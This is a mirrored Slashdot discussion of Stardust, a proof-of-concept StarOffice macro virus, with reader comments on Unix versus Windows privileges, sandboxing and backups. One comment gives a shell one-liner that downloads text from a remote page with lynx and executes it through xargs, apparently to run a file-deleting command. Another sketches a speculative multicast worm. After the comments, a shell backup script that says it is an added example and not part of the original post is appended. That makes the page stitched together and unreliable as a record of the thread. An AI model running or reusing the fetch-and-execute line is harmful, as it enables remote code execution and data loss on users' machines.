Slashdot Mirror


First StarOffice Virus Sighted

Sam Haine '95 writes "News.com is reporting on the creation of Stardust, a virus which uses macros to attack StarOffice, Sun's office suite. The malware was written as a proof-of-concept code to show what might be possible rather than as a serious attempt to create a new attack vector." From the article: "The pest is written in Star Basic. It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting."

10 of 166 comments

  1. it's still basically a OS security issue by yagu · · Score: 3, Interesting

    First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?

    Regardless, it's no secret or mystery: even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

    OTOH, while it is getting better in Windows, there are still far too many users set up with admin privileges, and we're a long way from sufficient education and reconfiguration such that a typical Windows user has safe access so exploits succeed in only local impact.

    Macros in documents are almost evil, I hate that everything sent somehow has to have its own life-force, but in properly configured systems, they're manageable. (I don't object to macros, I use them all the time, but to make them "required" to get the full effect of e-mail is annoying.)

    1. Re:it's still basically a OS security issue by 99BottlesOfBeerInMyF · · Score: 2, Interesting

      Regardless, it's no secret or mystery: even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

      I partially agree with you. Most office software on a normal *nix workstation, however, would have sufficient access to do damage, including erasing personal files and likely even connecting to the internet and sending spam or a DoS attack. Programs like this will have vulnerabilities. Right now, this is not too serious of a threat. A real piece of malware based on this would probably not even propagate anywhere, however it is a valid issue going forward, especially if market share increases.

      The solution in my mind is twofold. First, institute a VM, or Mandatory access control, or jail or whatever you want to call it for all applications. This would limit the exposure from the user directory, to just the files and network access of the application, unless the user specifically allowed the behavior. The second component is a versioned filesystem with redundancy to make sure any files it overwrote could be quickly and painlessly rolled back to the uncorrupted version. This still leaves some room for damage. A subtle malware could add text to a document that might be overlooked, and some clever social engineering could expand the attack. Still, I think both of these are logical directions for security improvements.

    2. Re:it's still basically a OS security issue by blibbler · · Score: 2, Interesting

      A Jail for all programs? I am no free software advocate, but that seems pretty extreme! Can't you give them a warning, or at least probation?

    3. Re:it's still basically a OS security issue by chill · · Score: 4, Interesting

      If I lose /, I can just download a clean distro. If I lose /home, I'm screwed. /home is infinitely more important on a single-user system.

      Actually, a complete reinstall on a Linux system is so trivial it doesn't matter -- as long as /home is a separate partition. And, of course, you have some skill with the system.

      I don't, nor do I know anyone that does, back up their /home folder daily. I do back it up weekly to a DVD-R, but nightly? The process is too much of a PITA. *CRITICAL* files are backed up, but there is so much that isn't critical, I don't bother.

      What I found was easy was to create a folder for all the updates I have installed (.tgz in my case, but .deb or .rpm for the non-Slackware types) and back THAT up to a CD-R on a regular basis. Then, I can do a reinstall -- skipping /home if possible -- from clean distro disks in maybe 20 minutes. Follow that up with a quick "upgradepkg /mnt/cdrom/updates/*.tgz" and I'm right back to where I was before disaster struck.

      I haven't played with it on Slackware, but on Fedora/Red Hat and their derivatives you could create a kickstart disk after your initial install to automate the reinstall. No need to choose timezones, package sets or anything. Very handy.

      I would like to point out that this is so damned easy because Linux DOES NOT USE A REGISTRY like Windows, but instead saves global configs in /etc and user configs in ~. The #1 complaint I had from people restoring Windows from scratch was that they had to waste so much time going back and tweaking the configs on all the software they use. Very, very time consuming.

        -Charles

      --
      Learning HOW to think is more important than learning WHAT to think.

  2. Why go through the trouble? by MagicM · · Score: 3, Interesting

    If you want to trick someone into viewing an image, why not just embed the image in the document?

    Where is the "proof" (and the "virus") in this "proof of concept virus"?

  3. Proof of Concept to infect the planet by packetmon · · Score: 4, Interesting

    I've floated the idea of a multicast based worm capable of infecting anyone who is accessing a multicast stream. I came up with this idea after some CCNP studies while doing some multicast tests. For those who need a briefer on how multicast works: What is Multicasting? Multicasting is a technique developed to send packets from one location in the Internet to many other locations, without any unnecessary packet duplication. In multicasting, one packet is sent from a source and is replicated as needed in the network to reach as many end-users as necessary.

    In my theory, a virus creator need only create, say, a corrupted image, sound, etc., and send it through networks as a spoofed source. For example, MSN, AIM, Yahoo! messengers all stream annoying advertisements, so what's to stop someone from creating a packet injection tool to stream a virus through to everyone listening for the multicast and infect their machine.

    Let D=Disney A=Attacker M=Multicast_Address DST=Destination... If A spoofs D sending bad data to M's DST... How many machines can possibly get infected. The framework is there and the possible outcome would be mass infections on a worse level than any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.

    Anyhow in relation to the article, there is no mention of which operating system this PoC affects but I'm sure it will only be a matter of time before someone creates all sorts of perl, sh, python scripts to try and make Unix zombies or so. Luckily I know of no colo places using StarOffice on big piped networks, so DDoS drones are unlikely to come out of this. Simply infected machines... Will be strange to see what else comes out of this.

  4. Re:Virus!? by IAmTheDave · · Score: 2, Interesting

    I don't call that a virus, I call it a feature.

    Speaking of features, apparently StarBasic has the ability to download content from the internet, and - get this - StarOffice has the ability to DISPLAY IMAGES.

    I knew it was insecure.

    --
    Excuse my speling.
    Making The Bar Project

  5. Re:A Virus by packetmon · · Score: 2, Interesting

    What do you think would happen if someone scripted something into it... Remember it's a proof of concept. Doesn't mean someone wouldn't be able to do something uberdumb in a shell...

    lynx -dump http://www.justpasha.org/folk/rm.html|sed -n '4p'|awk '{print $1,$2,$3}'|xargs exec

  6. Yawn by jofi · · Score: 2, Interesting

    So like every win32 virus it isn't a spawn of already existing code, and someone had to write it using an existing API or scripting engine that anyone can use and has already used for otherwise legitimate purposes? Get rid of scripting engines and APIs. Problem solved.

    --
    Blame the user, not the software.

  7. Meet my mother by atrocious+cowpat · · Score: 2, Interesting

    "I don't, nor do I know anyone that does, back up their /home folder daily."

    My mom works on a (OS X) Mac (small home office), so far safe as houses as far as viruses are concerned. Still her machine is backupped (is that actually a word?) on a 7-day-basis, i.e. every day of the week her user-directory is written to a different backup-set on a separate HD (= 7 different backups, one for each day of the week). Every 3-4 weeks I burn a snapshot of all her data onto DVDs. Why?

    It may seem like overkill, but I set things up this way not because I'm scared of the havoc a virus might wreak, but because I know that my mother every once in a while f*s up, deletes or otherwise ruins important files, preferably spreadsheets that are extremely painful to reconstruct. Her own files - not system files. And usually she doesn't notice until either 3 days or 3 months later.

    I sleep well, she can do whatever she wants, and everyone is happy.
    --
    sig? Oh, that sig...
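The weekday-rotated user-directory backup described in the comment above, as an added example that is not part of the original post or the poster's own setup; the directory names, the `day-N` slot layout and the use of `cp -a` are assumptions, and the demo data is constructed. Copying into a temporary directory first means a copy that fails halfway never destroys the previous copy in that slot.

```shell
#!/bin/sh
# Seven-slot rotating backup of a user directory, keyed on weekday (1=Mon..7=Sun).
# Added example, not from the original post; paths and layout are assumptions.

# backup_slot SRC DEST_BASE [DAY]
# Replaces DEST_BASE/day-DAY with a fresh copy of SRC, so at any time seven
# independent copies exist and a file ruined days ago can still be recovered.
backup_slot() {
  src="$1"; base="$2"; day="${3:-$(date +%u)}"
  slot="$base/day-$day"
  tmp="$base/.day-$day.tmp"
  [ -d "$src" ] || { echo "source $src missing" >&2; return 1; }
  mkdir -p "$base"
  rm -rf "$tmp"
  # copy to a temp dir first: a failed copy must not wipe the old slot
  cp -a "$src" "$tmp" || { rm -rf "$tmp"; return 1; }
  rm -rf "$slot"
  mv "$tmp" "$slot"
  echo "$slot"
}

# restore_file DEST_BASE DAY REL_PATH DEST
# Copies one file back from the chosen weekday slot; returns 1 if it is absent.
restore_file() {
  base="$1"; day="$2"; rel="$3"; dest="$4"
  [ -f "$base/day-$day/$rel" ] || return 1
  mkdir -p "$(dirname "$dest")"
  cp -p "$base/day-$day/$rel" "$dest"
}

# Demo on a constructed home directory: Monday copy, user ruins a spreadsheet,
# Tuesday copy captures the ruined version, Monday slot restores the good one.
demo() {
  work="$(mktemp -d)"
  mkdir -p "$work/home/docs"
  echo "q1 numbers" > "$work/home/docs/budget.ods"
  backup_slot "$work/home" "$work/bak" 1 >/dev/null
  echo "oops, wiped" > "$work/home/docs/budget.ods"
  backup_slot "$work/home" "$work/bak" 2 >/dev/null
  restore_file "$work/bak" 1 "docs/budget.ods" "$work/home/docs/budget.ods"
  cat "$work/home/docs/budget.ods"
  rm -rf "$work"
}
```

Run `backup_slot "$HOME" /Volumes/backupdisk` from a daily cron job to get the seven-slot rotation; `demo` prints the restored content, `q1 numbers`.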